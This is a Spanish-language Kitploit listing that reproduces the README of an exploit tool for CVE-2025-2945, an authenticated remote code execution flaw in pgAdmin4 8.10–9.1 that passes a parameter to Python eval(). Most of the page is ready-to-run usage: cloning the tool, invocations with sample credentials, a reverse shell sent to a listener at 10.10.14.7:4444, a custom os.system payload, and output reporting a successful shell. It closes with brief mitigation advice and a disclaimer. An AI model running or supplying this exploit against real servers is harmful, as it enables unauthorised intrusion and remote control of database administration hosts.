Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2945 — Exploit para la vulnerabilidad de Ejecución Remota de Código (RCE) de pgAdmin4 que afecta a las versiones 8.10 a 9.1. | Kitploit
Herramientas/GitHubGitHub/g0d150ne/cve-2025-2945
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

Exploit para la vulnerabilidad de Ejecución Remota de Código (RCE) de pgAdmin4 que afecta a las versiones 8.10 a 9.1.

Ver Repositorio
4hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-2945 - Exploit de RCE autenticado en pgAdmin4

Autor: G0D150NE Versión: 2.0.0
CVE: CVE-2025-2945
Severidad: Crítica (CVSS 9.9)

📌 Descripción

Exploit para la vulnerabilidad de ejecución remota de código (RCE) en pgAdmin4 que afecta a las versiones 8.10 a 9.1.

La vulnerabilidad se encuentra en el endpoint /sqleditor/query_tool/download, donde el parámetro query_commited se pasa sin sanitizar a la función eval() de Python, lo que permite la ejecución de código arbitrario.

⚡ Características

  • ✅ Detección automática de versión
  • ✅ Recolección del token CSRF desde múltiples fuentes
  • ✅ Enumeración de ID de servidor/grupo
  • ✅ Payload de reverse shell (codificado en base64)
  • ✅ Soporte de payload personalizado
  • ✅ Modo de depuración verbose
  • ✅ Salida de consola colorida
  • ✅ Omisión de verificación SSL

🚀 Instalación

root@kitploit:~
# Clone or download the script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Install dependencies
pip install requests

🎯 Uso

Uso básico

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

Con salida verbose

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

Payload personalizado

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

Omitir comprobación de versión

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 Argumentos

Argumento Requerido Descripción --target-url Sí URL base de pgAdmin4 (http://RHOST:PORT/) --username Sí Correo electrónico de inicio de sesión de pgAdmin4 --password Sí Contraseña de inicio de sesión de pgAdmin4 --db-user Sí Usuario de la base de datos --db-pass Sí Contraseña de la base de datos --db-name Sí Nombre de la base de datos --Rhost Sí IP del listener para el reverse shell --Rport Sí Puerto del listener para el reverse shell --max-server-id No ID máximo de servidor a escanear (predeterminado: 10) --skip-version-check No Omitir la verificación de versión --custom-payload No Payload personalizado de Python --verbose, -v No Habilitar salida de depuración --no-banner No Ocultar banner

📋 Requisitos

· Python 3.6+ · librería requests

root@kitploit:~
pip install requests

🧪 Entorno de pruebas

root@kitploit:~
# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Then run the exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ Ejemplo de salida

root@kitploit:~
   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ Mitigación

· Actualice pgAdmin4 a la versión 9.2 o superior · Restrinja el acceso a la interfaz de pgAdmin · Utilice credenciales seguras · Habilite MFA si está disponible

⚠️ Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. Su uso contra sistemas sin permiso explícito es ilegal. El autor no asume ninguna responsabilidad por el mal uso.

🔗 Referencias

· CVE-2025-2945 · Aviso de seguridad de pgAdmin

📄 Licencia

MIT License

Descargar herramienta